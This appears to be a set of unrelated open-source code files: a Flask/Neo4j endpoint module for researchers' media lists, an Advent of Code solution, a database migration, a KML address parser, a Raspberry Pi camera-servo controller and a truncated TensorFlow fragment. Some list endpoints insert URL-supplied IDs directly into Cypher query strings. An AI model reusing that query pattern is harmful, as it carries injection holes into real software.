query = (\n \"MATCH (n:List) \"\n \"{match} \"\n \"{optional} \"\n \"RETURN DISTINCT(n){counter}\".format(\n match=user_match, optional=optional_match, counter=count_items\n )\n )\n log.debug(\"query: {}\", query)\n\n # get total number of lists\n # numels = [row[0] for row in graph.cypher(count)][0]\n # log.debug(\"Total number of lists: {0}\", numels)\n\n data = []\n # meta_response = {\"totalItems\": numels}\n results = graph.cypher(query)\n # for res in [graph.List.inflate(row[0]) for row in results]:\n for row in results:\n res = graph.List.inflate(row[0])\n user_list = self.getJsonResponse(res)\n if i_am_admin and researcher is None:\n creator = res.creator.single()\n user_list[\"creator\"] = {\n \"uuid\": creator.uuid,\n \"name\": creator.name,\n \"surname\": creator.surname,\n }\n if belong_item is not None:\n for i in res.items.all():\n if i.downcast().uuid == belong_item:\n user_list[\"belong\"] = True\n break\n if nb_items:\n user_list[\"nb_items\"] = row[1]\n data.append(user_list)\n\n # return self.response(data, meta=meta_response)\n return self.response(data)\n\n @decorators.auth.require_all(\"Researcher\")\n @decorators.database_transaction\n @decorators.use_kwargs(\n {\"name\": fields.Str(required=True), \"description\": fields.Str(required=True)}\n )\n @decorators.endpoint(\n path=\"/lists\",\n summary=\"Create a new list\",\n responses={\n 201: \"List created successfully.\",\n 400: \"There is no content present in the request body or the content is not valid for list.\",\n 403: \"The user is not authorized to perform this operation.\",\n 409: \"There is already a list with that name.\",\n },\n )\n def post(self, name: str, description: str, user: User) -> Response:\n \"\"\"\n Create a new list.\n\n Only a researcher can create a list. Both name and description are\n mandatory. There can not be lists with the same name.\n \"\"\"\n log.debug(\"create a new list\")\n\n graph = neo4j.get_instance()\n\n # check if there is already a list with the same name belonging to the user.\n results = graph.cypher(\n \"MATCH (l:List)-[:LST_BELONGS_TO]-(:User {{uuid:'{user}'}})\"\n \" WHERE l.name =~ '(?i){name}' return l\".format(\n user=user.uuid, name=graph.sanitize_input(name)\n )\n )\n duplicate = [graph.List.inflate(row[0]) for row in results]\n if duplicate:\n raise Conflict(\n \"There is already a list with the same name belonging to you\"\n )\n\n created_list = graph.List(name=name, description=description).save()\n # connect the creator\n created_list.creator.connect(user)\n log.debug(\"List created successfully. 
UUID {}\", created_list.uuid)\n return self.response(self.getJsonResponse(created_list), code=201)\n\n @decorators.auth.require_all(\"Researcher\")\n @decorators.database_transaction\n @decorators.use_kwargs(\n {\"name\": fields.Str(required=True), \"description\": fields.Str(required=True)}\n )\n @decorators.endpoint(\n path=\"/lists/\",\n summary=\"Update a list\",\n description=\"Update a list of the researcher\",\n responses={\n 200: \"List updated successfully.\",\n 400: \"There is no content in the request body or the content is not valid\",\n 403: \"The user is not authorized to perform this operation.\",\n 404: \"List does not exist.\",\n 409: \"There is already another list with the same name among your lists.\",\n },\n )\n def put(self, list_id: str, name: str, description: str, user: User) -> Response:\n \"\"\"Update a list.\"\"\"\n log.debug(\"Update list with uuid: {}\", list_id)\n graph = neo4j.get_instance()\n user_list = graph.List.nodes.get_or_none(uuid=list_id)\n if not user_list:\n log.debug(\"List with uuid {} does not exist\", list_id)\n raise NotFound(\"Please specify a valid list id\")\n\n creator = user_list.creator.single()\n if not user or user.uuid != creator.uuid:\n raise Forbidden(\n \"You cannot update an user list that does not belong to you\"\n )\n\n # cannot update a list name if that name is already used for another list\n results = graph.cypher(\n \"MATCH (l:List) WHERE l.uuid <> '{uuid}'\"\n \" MATCH (l)-[:LST_BELONGS_TO]-(:User {{uuid:'{user}'}})\"\n \" WHERE l.name =~ '(?i){name}' return l\".format(\n uuid=list_id,\n user=user.uuid,\n name=graph.sanitize_input(name),\n )\n )\n duplicate = [graph.List.inflate(row[0]) for row in results]\n if duplicate:\n raise Conflict(f\"You already have a list with this name: {name}\")\n # update the list\n user_list.name = name.strip()\n user_list.description = description.strip()\n updated_list = user_list.save()\n log.debug(\"List successfully updated. UUID {}\", updated_list.uuid)\n return self.response(self.getJsonResponse(updated_list))\n\n @decorators.auth.require_all(\"Researcher\")\n @decorators.database_transaction\n @decorators.endpoint(\n path=\"/lists/\",\n summary=\"Delete a list\",\n description=\"Delete a list of the researcher.\",\n responses={\n 204: \"List deleted successfully.\",\n 403: \"The user is not authorized to perform this operation.\",\n 404: \"List does not exist.\",\n },\n )\n def delete(self, list_id: str, user: User) -> Response:\n \"\"\"Delete a list.\"\"\"\n log.debug(\"delete list {}\", list_id)\n\n graph = neo4j.get_instance()\n user_list = graph.List.nodes.get_or_none(uuid=list_id)\n if not user_list:\n log.debug(\"List with uuid {} does not exist\", list_id)\n raise NotFound(\"Please specify a valid list id\")\n\n log.debug(\"current user: {} - {}\", user.email, user.uuid)\n i_am_admin = self.auth.is_admin(user)\n log.debug(\"current user is admin? {0}\", i_am_admin)\n\n creator = user_list.creator.single()\n if user.uuid != creator.uuid and not i_am_admin:\n raise Forbidden(\n \"You cannot delete an user list that does not belong to you\"\n )\n\n # delete the list\n user_list.delete()\n log.debug(\"List delete successfully. 
UUID {}\", list_id)\n return self.empty_response()\n\n\nclass ListItemAbstract(IMCEndpoint):\n def __init__(self):\n IMCEndpoint.__init__(self)\n self.graph = neo4j.get_instance()\n\n def get_list_item_response(self, list_item):\n # look at the most derivative class\n # expected list_item of type :Item or :Shot\n mdo = list_item.downcast()\n item = None\n if isinstance(mdo, self.graph.Item):\n item = mdo\n elif isinstance(mdo, self.graph.Shot):\n item = mdo.item.single()\n else:\n raise ValueError(\"Invalid ListItem instance.\")\n creation = item.creation.single()\n if creation is None:\n raise ValueError(f\"Very strange. Item <{item.uuid}> with no metadata\")\n creation = creation.downcast()\n\n res = self.getJsonResponse(mdo, max_relationship_depth=0)\n api_url = get_backend_url()\n res[\"links\"] = {}\n if isinstance(mdo, self.graph.Item):\n # always consider v2 properties if exists\n v2 = item.other_version.single()\n content_type = f\"{item.item_type.split('-')[-1].lower()}s\"\n res[\"links\"][\n \"content\"\n ] = f\"{api_url}/api/{content_type}/{creation.uuid}/content?type={content_type[:-1]}\"\n res[\"links\"][\"thumbnail\"] = (\n f\"{api_url}/api/{content_type}/{creation.uuid}/content?type=thumbnail&size=large\"\n if item.item_type == \"Video\" or v2 is None\n else f\"{api_url}/api/{content_type}/{creation.uuid}/content?type={content_type[:-1]}\"\n )\n else:\n # SHOT\n res[\"links\"][\n \"content\"\n ] = f\"{api_url}/api/videos/{creation.uuid}/content?type=video\"\n # THIS IS WRONG. SHOULD BE get_frontend_url\n res[\"links\"][\"webpage\"] = f\"{api_url}/app/catalog/videos/{creation.uuid}\"\n res[\"links\"][\n \"thumbnail\"\n ] = f\"{api_url}/api/shots/{mdo.uuid}?content=thumbnail\"\n # add some video item attributes\n res[\"item\"] = {\n \"digital_format\": item.digital_format,\n \"dimension\": item.dimension,\n \"duration\": item.duration,\n \"framerate\": item.framerate,\n }\n\n res[\"creation_id\"] = creation.uuid\n res[\"rights_status\"] = creation.get_rights_status_display()\n for record_source in creation.record_sources.all():\n provider = record_source.provider.single()\n res[\"city\"] = provider.city\n break\n # add title\n for idx, t in enumerate(creation.titles.all()):\n # get default\n if not idx:\n res[\"title\"] = t.text\n # override with english text\n if t.language and t.language == \"en\":\n res[\"title\"] = t.text\n # add description\n for idx, desc in enumerate(creation.descriptions.all()):\n # get default\n if not idx:\n res[\"description\"] = desc.text\n # override with english text\n if desc.language and desc.language == \"en\":\n res[\"description\"] = desc.text\n # add contributor\n for agent in creation.contributors.all():\n rel = creation.contributors.relationship(agent)\n if (\n item.item_type == \"Video\"\n and agent.names\n and \"Director\" in rel.activities\n ):\n # expected one in the list\n res[\"director\"] = agent.names[0]\n break\n if (\n item.item_type == \"Image\"\n and agent.names\n and \"Creator\" in rel.activities\n ):\n # expected one in the list\n res[\"creator\"] = agent.names[0]\n break\n # add production year\n if item.item_type == \"Image\" and creation.date_created:\n res[\"production_year\"] = creation.date_created[0]\n if item.item_type == \"Video\" and creation.production_years:\n res[\"production_year\"] = creation.production_years[0]\n # add video format\n if item.item_type == \"Video\":\n video_format = creation.video_format.single()\n if video_format is not None:\n res[\"video_format\"] = self.getJsonResponse(\n video_format, 
max_relationship_depth=0\n )\n # add spatial coverage\n res[\"spatial_coverages\"] = []\n for spatial_coverage in creation.spatial_coverages.all():\n res[\"spatial_coverages\"].append(\n {\"value\": spatial_coverage.value, \"type\": spatial_coverage.spatial_type}\n )\n if len(res[\"spatial_coverages\"]) == 0:\n del res[\"spatial_coverages\"]\n # add temporal coverage\n res[\"temporal_coverages\"] = []\n for temporal_coverage in creation.temporal_coverages.all():\n res[\"temporal_coverages\"].append(temporal_coverage.value)\n if len(res[\"temporal_coverages\"]) == 0:\n del res[\"temporal_coverages\"]\n # add notes and links\n res[\"annotations\"] = {}\n notes = mdo.annotation.search(annotation_type=\"DSC\", private=False)\n if notes:\n res[\"annotations\"][\"notes\"] = []\n for n in notes:\n # expected single body here\n note_text = n.bodies.single().downcast()\n res[\"annotations\"][\"notes\"].append(\n {\"text\": note_text.value, \"language\": note_text.language}\n )\n links = mdo.annotation.search(annotation_type=\"LNK\", private=False)\n if links:\n res[\"annotations\"][\"links\"] = []\n for link in links:\n link_text = link.bodies.single().downcast()\n # a link can have a ReferenceBody\n if not isinstance(link_text, self.graph.TextualBody):\n continue\n res[\"annotations\"][\"links\"].append(link_text.value)\n if not res[\"annotations\"][\"links\"]:\n del res[\"annotations\"][\"links\"]\n if not res[\"annotations\"]:\n del res[\"annotations\"]\n return res\n\n def check_user_list(self, user, list_id):\n try:\n user_list = self.graph.List.nodes.get(uuid=list_id)\n except self.graph.List.DoesNotExist:\n log.debug(\"List with uuid {} does not exist\", list_id)\n raise NotFound(\"Please specify a valid list id\")\n # am I the owner of the list? (allowed also to admin)\n i_am_admin = self.auth.is_admin(user)\n creator = user_list.creator.single()\n if user.uuid != creator.uuid and not i_am_admin:\n raise Forbidden(\n \"You are not allowed to get a list that does not belong to you\",\n )\n return user_list\n\n\nclass ListItem(ListItemAbstract):\n \"\"\"Item in a user list.\"\"\"\n\n labels = [\"list item\"]\n\n @decorators.auth.require_all(\"Researcher\")\n @decorators.endpoint(\n path=\"/lists/<list_id>/items/<item_id>\",\n summary=\"Get a single item of a list.\",\n description=\"Get a single item of a list.
\",\n responses={\n 200: \"The requested item.\",\n 403: \"The user is not authorized to perform this operation.\",\n 404: \"List does not exist.\",\n },\n )\n def get(self, list_id: str, item_id: str, user: User) -> Response:\n \"\"\"Get a certain item of a user list\"\"\"\n user_list = self.check_user_list(user, list_id)\n log.debug(\n \"Get item <{}> of the list <{}, {}>\".format(\n item_id, user_list.uuid, user_list.name\n )\n )\n # Find item with uuid in the user_list\n # res = user_list.items.search(uuid=item_id)\n results = self.graph.cypher(\n \"MATCH (l:List {{uuid:'{uuid}'}})\"\n \" MATCH (l)-[:LST_ITEM]->(i:ListItem {{uuid:'{item}'}})\"\n \" RETURN i\"\n \"\".format(uuid=list_id, item=item_id)\n )\n res = [self.graph.ListItem.inflate(row[0]) for row in results]\n if not res:\n raise NotFound(\n \"Item <{}> is not connected to the list <{}, {}>\".format(\n item_id, user_list.uuid, user_list.name\n )\n )\n return self.response(self.get_list_item_response(res[0]))\n\n\nclass ListItems(ListItemAbstract):\n \"\"\"List of items in a list.\"\"\"\n\n labels = [\"list of items\"]\n\n @decorators.auth.require_all(\"Researcher\")\n @decorators.endpoint(\n path=\"/lists/<list_id>/items\",\n summary=\"List of items in a list.\",\n description=\"Get all the items of a list. The result supports paging.\",\n responses={\n 200: \"A list of items.\",\n 403: \"The user is not authorized to perform this operation.\",\n 404: \"List does not exist.\",\n },\n )\n def get(self, list_id: str, user: User) -> Response:\n \"\"\"Get all the items of a user list\"\"\"\n user_list = self.check_user_list(user, list_id)\n log.debug(\n \"Get all the items of the list <{}, {}>\", user_list.uuid, user_list.name\n )\n\n data = []\n for list_item in user_list.items.all():\n data.append(self.get_list_item_response(list_item))\n return self.response(data)\n\n @decorators.auth.require_all(\"Researcher\")\n @decorators.database_transaction\n @decorators.use_kwargs(Target)\n @decorators.endpoint(\n path=\"/lists/<list_id>/items\",\n summary=\"Add an item to a list.\",\n responses={\n 204: \"Item added successfully.\",\n 400: \"Bad request body or target node does not exist.\",\n 403: \"The user is not authorized to perform this operation.\",\n 404: \"List does not exist.\",\n 409: \"The item is already connected to that list.\",\n },\n )\n def post(\n self, list_id: str, target: Dict[str, Dict[str, str]], user: User\n ) -> Response:\n \"\"\"Add an item to a list.\"\"\"\n log.debug(\"Add an item to list {} with target {}\", list_id, target)\n\n user_list = self.graph.List.nodes.get_or_none(uuid=list_id)\n if not user_list:\n log.debug(\"List with uuid {} does not exist\", list_id)\n raise NotFound(\"Please specify a valid list id\")\n\n # am I the creator of the list?\n creator = user_list.creator.single()\n if user.uuid != creator.uuid:\n raise Forbidden(\n \"You cannot add an item to a list that does not belong to you\"\n )\n\n target_type = target.get(\"type\")\n target_id = target.get(\"id\")\n\n log.debug(\"target type: {}, target id: {}\", target_type, target_id)\n target_node = None\n if target_type == \"item\":\n target_node = self.graph.Item.nodes.get_or_none(uuid=target_id)\n elif target_type == \"shot\":\n target_node = self.graph.Shot.nodes.get_or_none(uuid=target_id)\n\n if target_node is None:\n raise BadRequest(f\"Target [{target_type}:{target_id}] does not exist\")\n # check if the incoming target is already connected to the list\n if target_node.lists.is_connected(user_list):\n raise Conflict(\n 
f\"The item is already connected to the list {list_id}, {user_list.name}\"\n )\n # connect the target to the list\n user_list.items.connect(target_node)\n log.debug(\n \"Item {} added successfully to list <{}, {}>\",\n target,\n list_id,\n user_list.name,\n )\n # 204: return empty response (?)\n return self.empty_response()\n\n @decorators.auth.require_all(\"Researcher\")\n @decorators.database_transaction\n @decorators.endpoint(\n path=\"/lists//items/\",\n summary=\"Delete an item from a list.\",\n responses={\n 204: \"Item deleted successfully.\",\n 403: \"The user is not authorized to perform this operation.\",\n 404: \"List or item does not exist.\",\n },\n )\n def delete(self, list_id: str, item_id: str, user: User) -> Response:\n \"\"\"Delete an item from a list.\"\"\"\n user_list = self.graph.List.nodes.get_or_none(uuid=list_id)\n if not user_list:\n log.debug(\"List with uuid {} does not exist\", list_id)\n raise NotFound(\"Please specify a valid list id\")\n\n log.debug(\n \"delete item <{}> from the list <{}, {}>\",\n item_id,\n user_list.uuid,\n user_list.name,\n )\n # am I the creator of the list? (always allowed to admin)\n i_am_admin = self.auth.is_admin(user)\n creator = user_list.creator.single()\n if user.uuid != creator.uuid and not i_am_admin:\n raise Forbidden(\n \"You are not allowed to delete from a list that does not belong to you\",\n )\n\n matched_item = None\n for list_item in user_list.items.all():\n item = list_item.downcast()\n if item.uuid == item_id:\n matched_item = item\n break\n\n if matched_item is None:\n list_info = f\"{user_list.uuid}, {user_list.name}\"\n raise NotFound(f\"Item <{item_id}> does not belong the list {list_info}\")\n\n # disconnect the item\n user_list.items.disconnect(matched_item)\n log.debug(\n \"Item <{}> remeved from the list <{}, {}>successfully.\",\n item_id,\n user_list.uuid,\n user_list.name,\n )\n return self.empty_response()\n","repo_name":"mdantonio-c/imediacities","sub_path":"projects/imc/backend/endpoints/lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":26442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"5037393407","text":"import random\nfrom operator import attrgetter, iadd\n\nfrom tests.factories import *\n\n\ndef test():\n o = FacOrdonnance()\n l = random.choices((FacMedicament, FacConseil), k=10)\n e = [i(ordonnance=o) for i in l]\n random.shuffle(e)\n for i, x in zip(e, range(10)):\n i.position = x\n f = \"id : {} position : {} \"\n return e\n\n print('----------départ---------------')\n for i in e:\n print(f.format(i.id, i.position, i.__str__()))\n\n print('----------cherche index')\n index = 0\n rid = e[3].id #id recherché\n for i, x in zip(e, range(len(e))):\n if i.id == rid:\n index = x\n print(\"id \" + str(rid) + \"à l'index : \" + str(index))\n\n print('-------- + 1 après new pose prévu-----------------')\n np = 6\n for i in e[6:]:\n i.position += 1\n\n for i in e:\n print(f.format(i.id, i.position, i.__str__()))\n print('----------moins index 3---------------------')\n item = e.pop(index)\n item.position = np\n for i in e:\n print(f.format(i.id, i.position, i.__str__()))\n print(\"item : \", item.id, item.position, item.__str__())\n print('--------on ajoute à np-----------')\n for i in e:\n print(f.format(i.id, i.position, i.__str__()))\n return e\n\n\n\"\"\"\nnp en index\nap en index\n\nsi ap > np\n list[np].position +=1\nsi ap < np\n\n\"\"\"\n\n\ndef change_pos(e, ap, np):\n import copy\n a = copy.deepcopy(e)\n \"\"\"\n 
reassignment of the ranks according to the position in the list:\n 2 special cases:\n - ap and np are consecutive, so a simple swap\n - np at the last position\n \"\"\"\n\n if abs(np - ap) == 1:\n # 1 rank of difference, so we just swap\n a[ap].position = np\n a[np].position = ap\n\n elif ap > np:\n if np == len(a) - 1:\n # last position, so set a max pos for the ordering\n a[ap].position = len(a)\n else:\n a[ap].position = np\n a[np].position += 1\n elif ap < np:\n a[ap].position = np\n\n else:\n return copy.deepcopy(a)\n a.sort(key=attrgetter('position'))\n for i, x in zip(a, range(10)):\n i.position = x\n return copy.deepcopy(a)\n","repo_name":"jgirardet/unolog","sub_path":"sandbox.py","file_name":"sandbox.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"}
+{"seq_id":"21636288503","text":"\"\"\"empty message\n\nRevision ID: 4d906cd9a206\nRevises: 4f91f8e6df1a\nCreate Date: 2019-12-10 23:36:46.967859\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '4d906cd9a206'\ndown_revision = '4f91f8e6df1a'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('users', sa.Column('default_target_id', sa.Integer(), nullable=True))\n op.create_foreign_key(None, 'users', 'connectors', ['default_target_id'], ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'users', type_='foreignkey')\n op.drop_column('users', 'default_target_id')\n # ### end Alembic commands ###\n","repo_name":"ventor-tech/time-sync","sub_path":"migrations/versions/4d906cd9a206_.py","file_name":"4d906cd9a206_.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"73817401591","text":"from django import template\nfrom rdrf.models.definition.models import Registry\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef site_info():\n \"\"\"\n Provide info about which registry is installed\n Only makes sense when one and only one installed\n \"\"\"\n try:\n registry_model = Registry.objects.get()\n return registry_model.version\n except Registry.MultipleObjectsReturned:\n return \"\"\n except Registry.DoesNotExist:\n return \"\"\n","repo_name":"muccg/rdrf","sub_path":"rdrf/rdrf/templatetags/site_info.py","file_name":"site_info.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"95"}
+{"seq_id":"22843331987","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 19 08:29:38 2020\r\n\r\n@author: JosephKuchar\r\n\r\nThis script processes the address file from the Saskatoon open data portal\r\n(http://opendata-saskatoon.cloudapp.net/DataBrowser/SaskatoonOpenDataCatalogueBeta/ParcelAddress#param=NOFILTER--DataView--Results)\r\nit's a kml file with embedded html, so this parses different parts of the file\r\nusing either html or xml parsing\r\n\"\"\"\r\nimport pandas as pd\r\nfrom bs4 import BeautifulSoup as Soup\r\n\r\nwith open(\"Saskatoon/ParcelAddress.kml\") as data:\r\n kml_soup = Soup(data, 'lxml-xml') # Parse as XML\r\nNUMBER=[]\r\nADDRESS=[]\r\ndescriptions = kml_soup.find_all('description')[1:]\r\nfor description in descriptions:\r\n html_soup = Soup(description.text, 'lxml') # 
Parse as HTML\r\n \r\n num=html_soup.find(\"td\",string='STREET_NUMBER').find_next(\"td\").get_text()\r\n add=html_soup.find(\"td\",string='ONLINE_ADDRESS').find_next(\"td\").get_text()\r\n ADDRESS.append(add)\r\n NUMBER.append(num)\r\n\r\n\r\nLON=[]\r\nLAT=[]\r\n\r\npoints = kml_soup.find_all('coordinates')\r\nfor point in points:\r\n xy=point.get_text().split(',')\r\n \r\n LON.append(xy[0])\r\n LAT.append(xy[1])\r\n\r\nSTREET=ADDRESS.copy()\r\n\r\nfor i in range(len(STREET)):\r\n STREET[i]=STREET[i].strip(NUMBER[i]).strip()\r\n STREET[i]=STREET[i].rstrip(', Saskatoon, SK CA')\r\n\r\ndict={'NUMBER':NUMBER, 'STREET':STREET,'ADDRESS':ADDRESS,'LON':LON,'LAT':LAT}\r\n\r\ndf=pd.DataFrame(dict)\r\ndf.to_csv('Saskatoon.csv',index=False)\r\n","repo_name":"CSBP-CPSE/LODE-ECDO","sub_path":"scripts/Addresses/process_saskatoon.py","file_name":"process_saskatoon.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"95"} +{"seq_id":"17200943874","text":"# --- Day 16: Aunt Sue ---\n\n# Your Aunt Sue has given you a wonderful gift, and you'd like to send her a\n# thank you card. However, there's a small problem: she signed it \"From, Aunt\n# Sue\".\n\n# You have 500 Aunts named \"Sue\".\n\n# So, to avoid sending the card to the wrong person, you need to figure out\n# which Aunt Sue (which you conveniently number 1 to 500, for sanity) gave you\n# the gift. You open the present and, as luck would have it, good ol' Aunt Sue\n# got you a My First Crime Scene Analysis Machine! Just what you wanted. Or\n# needed, as the case may be.\n\n# The My First Crime Scene Analysis Machine (MFCSAM for short) can detect a few\n# specific compounds in a given sample, as well as how many distinct kinds of\n# those compounds there are. According to the instructions, these are what the\n# MFCSAM can detect:\n\n# children, by human DNA age analysis.\n# cats. It doesn't differentiate individual breeds.\n# Several seemingly random breeds of dog: samoyeds, pomeranians, akitas, and vizslas.\n# goldfish. No other kinds of fish.\n# trees, all in one group.\n# cars, presumably by exhaust or gasoline or something.\n# perfumes, which is handy, since many of your Aunts Sue wear a few kinds.\n\n# In fact, many of your Aunts Sue have many of these. You put the wrapping from\n# the gift into the MFCSAM. It beeps inquisitively at you a few times and then\n# prints out a message on ticker tape:\n\n# children: 3\n# cats: 7\n# samoyeds: 2\n# pomeranians: 3\n# akitas: 0\n# vizslas: 0\n# goldfish: 5\n# trees: 3\n# cars: 2\n# perfumes: 1\n\n# You make a list of the things you can remember about each Aunt Sue. Things\n# missing from your list aren't zero - you simply don't remember the value.\n\n# What is the number of the Sue that got you the gift?\n\n# --- Part Two ---\n\n# As you're about to send the thank you note, something in the MFCSAM's\n# instructions catches your eye. 
Apparently, it has an outdated\n# retroencabulator, and so the output from the machine isn't exact values - some\n# of them indicate ranges.\n\n# In particular, the cats and trees readings indicates that there are greater\n# than that many (due to the unpredictable nuclear decay of cat dander and tree\n# pollen), while the pomeranians and goldfish readings indicate that there are\n# fewer than that many (due to the modial interaction of magnetoreluctance).\n\n# What is the number of the real Aunt Sue?\n\nimport sys\n\ndef main( argv ):\n\n # Read in input file and add up the sums\n with open( \"input/day16-input.txt\", \"r\" ) as f:\n data = f.readlines()\n\n sues = {}\n\n for line in data:\n line = line.strip().split( ':', maxsplit=1 )\n\n sueNum = line[ 0 ].split()[ 1 ]\n attrib = {key.strip(): int( val ) for key, val in [ item.split( ': ' ) for item in line[ 1 ].split( ', ' ) ]}\n sues[ sueNum ] = attrib\n\n tape = [ ('children', 3),\n ('cats', 7),\n ('samoyeds', 2),\n ('pomeranians', 3),\n ('akitas', 0),\n ('vizslas', 0),\n ('goldfish', 5),\n ('trees', 3),\n ('cars', 2),\n ('perfumes', 1) ]\n\n ##\n # Part 1\n ##\n\n realSue = 'Not found'\n\n for key, val in sues.items():\n for item in tape:\n if item[ 0 ] not in val.keys():\n continue\n elif val[ item[ 0 ] ] != item[ 1 ]:\n break\n else:\n realSue = key\n\n print( f\"Part 1 answer: {realSue}\" )\n\n ##\n # Part 2\n ##\n\n realSue = 'Not found'\n\n for key, val in sues.items():\n for item in tape:\n if item[ 0 ] not in val.keys():\n continue\n elif item[ 0 ] == 'cats' or item[ 0 ] == 'trees':\n if val[ item[ 0 ] ] <= item[ 1 ]:\n break\n elif item[ 0 ] == 'pomeranians' or item[ 0 ] == 'goldfish':\n if val[ item[ 0 ] ] >= item[ 1 ]:\n break\n elif val[ item[ 0 ] ] != item[ 1 ]:\n break\n else:\n realSue = key\n\n print( f\"Part 2 answer: {realSue}\" )\n\n\nif __name__ == \"__main__\":\n main( argv=sys.argv )","repo_name":"cstumps/AOC","sub_path":"AOC-2015/day16.py","file_name":"day16.py","file_ext":"py","file_size_in_byte":4134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"35361728361","text":"import RPi.GPIO as GPIO\nimport time\nimport cv2\nimport logging\n\n\nclass CameraControl:\n # Camera Servo Pin\n Camera_ServoPin = 11 # S2\n Camera_ServoPinB = 9 # S3\n cap: any\n search_direction = 1\n\n def __init__(self, camera_id, width, height, camera_x_angle, camera_y_angle) -> None:\n self.camera_id = camera_id\n self.width = width\n self.height = height\n self.camera_x_angle = camera_x_angle\n self.camera_y_angle = camera_y_angle\n pass\n\n def init(self):\n logging.info(\"start initing camera control [width: %s, height: %s, camera X angle: %s, camera Y angle: %s]\",\n self.width, self.height, self.camera_x_angle, self.camera_y_angle)\n\n GPIO.setup(self.Camera_ServoPin, GPIO.OUT)\n GPIO.setup(self.Camera_ServoPinB, GPIO.OUT)\n\n time.sleep(2)\n\n count = 5\n while count > 0:\n self.servo_control(self.camera_x_angle, self.camera_y_angle)\n count -= 1\n\n # Start capturing video input from the camera\n self.cap = cv2.VideoCapture(self.camera_id)\n self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, self.width)\n self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, self.height)\n\n logging.info(\"complete initing camera control\")\n\n def adjust_lower(self):\n if self.camera_y_angle > 58:\n self.camera_y_angle -= 3\n logging.info(\"adjust camera lower: %s\", self.camera_y_angle)\n self.servo_pulse(self.Camera_ServoPinB, self.camera_y_angle)\n \n def search(self):\n if self.search_direction == 1:\n if 
self.camera_x_angle < 150:\n self.camera_x_angle += 5\n else:\n self.search_direction = -1\n else:\n if self.camera_x_angle > 30:\n self.camera_x_angle -= 5\n else:\n self.search_direction = 1\n logging.info(\"search... direction: %s, angle: %s\", self.search_direction, self.camera_x_angle)\n self.servo_pulse(self.Camera_ServoPin, self.camera_x_angle)\n\n def current_x_angle(self):\n return self.camera_x_angle\n\n def reset_x_angle(self):\n self.servo_pulse(self.Camera_ServoPin, 90)\n\n def adjust_left(self):\n if self.camera_x_angle < 170:\n self.camera_x_angle += 3\n logging.info(\"adjust camera left: %s\", self.camera_x_angle)\n self.servo_pulse(self.Camera_ServoPin, self.camera_x_angle)\n\n def adjust_right(self):\n if self.camera_x_angle > 10:\n self.camera_x_angle -= 5\n logging.info(\"adjust camera right: %s\", self.camera_x_angle)\n self.servo_pulse(self.Camera_ServoPin, self.camera_x_angle)\n\n # define a pulse function, generate pwm using simulation way\n # base pulse 20ms, maintain high level range within 0.5-2.5ms to control 0-180 angle\n def servo_pulse(self, servo, angle):\n pulsewidth = (angle * 11) + 500\n logging.debug(\"camera pulse: \" + str(servo) +\n \", angle: \" + str(pulsewidth))\n GPIO.output(servo, GPIO.HIGH)\n time.sleep(pulsewidth/1000000.0)\n GPIO.output(servo, GPIO.LOW)\n time.sleep(20.0/1000-pulsewidth/1000000.0)\n\n def servo_control(self, angle_1, angle_2):\n self.servo_pulse(self.Camera_ServoPin, angle_1)\n self.servo_pulse(self.Camera_ServoPinB, angle_2)\n\n def read_image(self):\n if self.cap.isOpened():\n return self.cap.read()\n else:\n return False, None\n\n def release(self):\n if self.cap:\n self.cap.release()","repo_name":"twinssbc/travel-robot","sub_path":"camera_control.py","file_name":"camera_control.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"3352979968","text":"from adict import adict\nimport tensorflow as tf\n\n# From homework 5\ndef weight_variable(shape):\n return tf.get_variable('w', shape)\n\ndef bias_variable(shape):\n return tf.get_variable('b', shape)\n\ndef conv2d(input_mat, output_size, kernel_height, kernel_width, scope):\n with tf.variable_scope(scope):\n input_size = input_mat.get_shape()[-1]\n weight_shape = [kernel_height, kernel_width, input_size, output_size]\n w = weight_variable(weight_shape)\n b = bias_variable([output_size])\n return tf.nn.conv2d(input_mat, w, strides=[1, 1, 1, 1], padding='VALID') + b\n\n# just simply linear transform (X*W+B)\ndef linear_transform(input_mat, output_size, scope):\n with tf.variable_scope(scope):\n input_size = input_mat.get_shape().as_list()[1]\n weight_shape = [output_size, input_size]\n w = tf.get_variable(\"w\", weight_shape)\n b = tf.get_variable(\"b\", [output_size])\n\n # w = weight_variable([output_size, input_size])\n # b = bias_variable([output_size])\n return tf.matmul(input_mat, tf.transpose(w)) + b\n\n\ndef time_delayed_network(input_mat, scope):\n with tf.variable_scope(scope):\n # from the paper, features\n patch_sizes = [ 1, 2, 3, 4, 5, 6, 7]\n num_channels = [50, 100, 150, 200, 200, 200, 200]\n\n max_word_length = input_mat.get_shape()[1]\n input_mat = tf.expand_dims(input_mat, 1)\n layers = []\n for i in range(len(patch_sizes)):\n patch_size, output_size = patch_sizes[i], num_channels[i]\n new_length = max_word_length - patch_size + 1\n # house keeping conv and pool\n conv = conv2d(input_mat, output_size, 1, patch_size, \"patch%d\" % patch_size)\n pool_w = [1, 1, 
